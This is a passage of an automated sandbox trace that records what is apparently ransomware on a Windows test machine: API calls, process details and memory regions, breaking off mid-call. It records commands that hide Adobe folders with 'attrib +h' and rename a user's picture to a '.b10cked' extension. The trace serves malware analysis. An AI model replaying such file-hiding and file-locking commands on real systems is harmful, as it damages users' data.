lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, 
lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.674] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.674] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: 
lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.674] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.674] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.674] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.698] _close (_FileHandle=4) returned 0 [0146.699] FindNextFileW (in: hFindFile=0x41e798, lpFindFileData=0x26ede8 | out: lpFindFileData=0x26ede8) returned 0 [0146.700] GetLastError () returned 0x12 [0146.700] FindClose (in: hFindFile=0x41e798 | out: hFindFile=0x41e798) returned 1 [0146.700] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0146.708] _close (_FileHandle=3) returned 0 [0146.708] GetConsoleTitleW (in: lpConsoleTitle=0x26f220, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.708] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.709] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0146.709] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.709] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 
0xffffffff [0146.709] GetLastError () returned 0x2 [0146.709] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0xffffffff [0146.709] GetLastError () returned 0x2 [0146.709] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0x41e798 [0146.709] FindClose (in: hFindFile=0x41e798 | out: hFindFile=0x41e798) returned 1 [0146.710] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0xffffffff [0146.710] GetLastError () returned 0x2 [0146.710] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0x41e798 [0146.710] FindClose (in: hFindFile=0x41e798 | out: hFindFile=0x41e798) returned 1 [0146.710] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0146.710] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0146.710] GetConsoleTitleW (in: lpConsoleTitle=0x26efb4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.710] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ee3c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26ef04 | out: lpAttributeList=0x26ee3c, lpSize=0x26ef04) returned 1 [0146.710] UpdateProcThreadAttribute (in: lpAttributeList=0x26ee3c, dwFlags=0x0, Attribute=0x60001, lpValue=0x26eefc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ee3c, lpPreviousValue=0x0) returned 1 [0146.710] GetStartupInfoW (in: lpStartupInfo=0x26edf8 | out: 
lpStartupInfo=0x26edf8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0146.710] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0146.710] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26ee98*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26eee4 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" ", lpProcessInformation=0x26eee4*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb30, dwThreadId=0xb5c)) returned 1 [0146.712] CloseHandle (hObject=0x50) returned 1 [0146.712] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0146.712] GetEnvironmentStringsW () returned 0x422e78* [0146.712] FreeEnvironmentStringsW (penv=0x422e78) returned 1 [0146.712] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0146.754] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x26edd8 | out: lpExitCode=0x26edd8*=0x0) returned 1 [0146.754] CloseHandle (hObject=0x4c) returned 1 [0146.754] _vsnwprintf (in: _Buffer=0x26ef20, _BufferCount=0x13, 
_Format="%08X", _ArgList=0x26ede4 | out: _Buffer="00000000") returned 8 [0146.754] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0146.754] GetEnvironmentStringsW () returned 0x422e78* [0146.755] FreeEnvironmentStringsW (penv=0x422e78) returned 1 [0146.755] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0146.755] GetEnvironmentStringsW () returned 0x422e78* [0146.755] FreeEnvironmentStringsW (penv=0x422e78) returned 1 [0146.755] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ee3c | out: lpAttributeList=0x26ee3c) [0146.755] GetConsoleTitleW (in: lpConsoleTitle=0x26f220, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.755] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.755] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0146.755] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.755] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0xffffffff [0146.755] GetLastError () returned 0x2 [0146.755] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0xffffffff [0146.756] GetLastError () returned 0x2 [0146.756] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0x41e798 [0146.756] 
FindClose (in: hFindFile=0x41e798 | out: hFindFile=0x41e798) returned 1 [0146.756] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0xffffffff [0146.756] GetLastError () returned 0x2 [0146.756] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0x41e798 [0146.756] FindClose (in: hFindFile=0x41e798 | out: hFindFile=0x41e798) returned 1 [0146.756] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0146.756] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0146.756] GetConsoleTitleW (in: lpConsoleTitle=0x26efb4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.756] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ee3c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26ef04 | out: lpAttributeList=0x26ee3c, lpSize=0x26ef04) returned 1 [0146.756] UpdateProcThreadAttribute (in: lpAttributeList=0x26ee3c, dwFlags=0x0, Attribute=0x60001, lpValue=0x26eefc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ee3c, lpPreviousValue=0x0) returned 1 [0146.756] GetStartupInfoW (in: lpStartupInfo=0x26edf8 | out: lpStartupInfo=0x26edf8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0146.757] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0146.757] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h 
\"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26ee98*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26eee4 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"", lpProcessInformation=0x26eee4*(hProcess=0x50, hThread=0x4c, dwProcessId=0x794, dwThreadId=0xba0)) returned 1 [0146.758] CloseHandle (hObject=0x4c) returned 1 [0146.758] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0146.758] GetEnvironmentStringsW () returned 0x423a78* [0146.758] FreeEnvironmentStringsW (penv=0x423a78) returned 1 [0146.758] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0146.792] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26edd8 | out: lpExitCode=0x26edd8*=0x0) returned 1 [0146.792] CloseHandle (hObject=0x50) returned 1 [0146.792] _vsnwprintf (in: _Buffer=0x26ef20, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ede4 | out: _Buffer="00000000") returned 8 [0146.792] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0146.793] GetEnvironmentStringsW () returned 0x423a78* [0146.793] FreeEnvironmentStringsW (penv=0x423a78) returned 1 [0146.793] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0146.793] GetEnvironmentStringsW () returned 0x423a78* [0146.793] FreeEnvironmentStringsW (penv=0x423a78) returned 1 [0146.793] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ee3c | out: lpAttributeList=0x26ee3c) 
[0146.793] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.793] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.793] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.793] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.794] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.794] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.794] SetConsoleInputExeNameW () returned 0x1 [0146.794] GetConsoleOutputCP () returned 0x1b5 [0146.794] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.794] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.794] exit (_Code=0) Process: id = "204" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16de0" os_pid = "0xaf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17675 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17676 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17677 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17678 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 17679 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17680 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17681 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17682 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17683 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 17684 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17725 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17726 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17727 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17728 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private 
name = "private_0x00000000001f0000" filename = "" Region: id = 17729 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 17730 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17731 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17732 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17733 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17734 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17735 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17736 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17737 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: 
"c:\\windows\\system32\\gdi32.dll") Region: id = 17738 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17739 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17740 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17741 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17742 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 17743 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 17744 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 17745 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 17746 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 17747 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 17748 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Thread: id = 259 os_tid = 0xa74 [0146.019] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f8dc | out: 
lpSystemTimeAsFileTime=0x30f8dc*(dwLowDateTime=0x90f77c40, dwHighDateTime=0x1d440a9)) [0146.019] GetCurrentProcessId () returned 0xaf4 [0146.019] GetCurrentThreadId () returned 0xa74 [0146.019] GetTickCount () returned 0x2d74b [0146.019] QueryPerformanceCounter (in: lpPerformanceCount=0x30f8d4 | out: lpPerformanceCount=0x30f8d4*=20280788930) returned 1 [0146.019] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0146.019] __set_app_type (_Type=0x1) [0146.019] __p__fmode () returned 0x76b331f4 [0146.020] __p__commode () returned 0x76b331fc [0146.020] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0146.020] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0146.020] GetCurrentThreadId () returned 0xa74 [0146.020] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa74) returned 0x38 [0146.020] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.020] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0146.020] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.020] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0146.020] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f86c | out: phkResult=0x30f86c*=0x0) returned 0x2 [0146.020] VirtualQuery (in: lpAddress=0x30f8a3, lpBuffer=0x30f83c, dwLength=0x1c | out: lpBuffer=0x30f83c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.021] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f83c, dwLength=0x1c | out: lpBuffer=0x30f83c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, 
